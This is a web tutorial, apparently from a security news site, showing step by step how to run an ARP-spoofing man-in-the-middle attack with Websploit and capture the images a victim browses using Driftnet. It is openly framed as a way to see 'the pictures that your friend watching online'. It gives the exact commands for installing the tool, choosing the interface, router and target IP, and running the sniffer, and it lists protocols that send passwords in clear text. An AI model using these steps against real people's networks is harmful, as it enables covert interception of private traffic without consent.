Thursday, February 27, 2025
HomeSniffing & SpoofingDriftnet - Tool used to Capture Images that Your Friend looking at...

Driftnet – Tool used to Capture Images that Your Friend looking at Online

Published on

SIEM as a Service

Follow Us on Google News

How we can launch a MITM attack with Websploit and the Driftnet – Tool used to capture images.

MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step 1: Need to install websploit in Kali if not present.

root@kali:~# apt-get install websploit

Step2: To Run the websploit

root@kali:~# websploit

Step 3: Next we need to list the modules with the websploit.

wsf > show modules

Driftnet - Tool used to capture images

Step 4: Need to select network/mitm under Network modules.

wsf > use network/mitm
wsf:MITM > show options

Driftnet - Tool used to capture images

Interface: Need to specify the network adapter interface based on our network adapter.

  • set Interface eth0
  • set Interface wlan0

Router: Need to specify Router IP, which can be found with the command route -n.

set Router (Gateway IP)

Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.

Driftnet - Tool used to capture images

Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.

wsf:MITM > run

Driftnet - Tool used to capture images

Step 6: Now go down to the victim machine and start surfing, all the images would be captured by drifnet.

Driftnet - Tool used to capture images

Here you can find the pictures that your friend watching online.

Protocols Vulnerable to Sniffing

  • HTTP: Sends passwords in clear text
  • TELNET: Transfer commands in plain text
  • SNMP: Sends passwords in clear text
  • POP: Sends passwords in clear text
  • FTP: Sends passwords in clear text
  • NNTP: Sends passwords in clear text
  • IMAP: Sends passwords in clear text

If you have any doubt please don’t hesitate to leave a comment.

Also, find more Tutorials with Kali Linux

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Lotus Blossom Hacker Group Uses Dropbox, Twitter, and Zimbra for C2 Communications

The Lotus Blossom hacker group, also known as Spring Dragon, Billbug, or Thrip, has...

Squidoor: Multi-Vector Malware Exploiting Outlook API, DNS & ICMP Tunneling for C2

A newly identified malware, dubbed "Squidoor," has emerged as a sophisticated threat targeting government,...

Unpatched Vulnerabilities Attract Cybercriminals as EDR Visibility Remains Limited

Cyber adversaries have evolved into highly organized and professional entities, mirroring the operational efficiency...

Threat Actors Attack Job Seekers of Fortune 500 Companies to Steal Personal Details

In Q3 2024, Cofense Intelligence uncovered a targeted spear-phishing campaign aimed at employees working...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Tor Network Suffers IP Spoofing Attack Via Non-Exit Relays

In late October 2024, a coordinated IP spoofing attack targeted the Tor network, prompting...

10 Most Common Types of Cyber Attacks in 2023

Cyber attacks are evolving rapidly with advancements in technology, as threat actors exploit new...

Sniffing as easy as possible with Ettercap Tool

Sniffing includes catching, translating, inspecting, and interpreting the data inside a network packet on...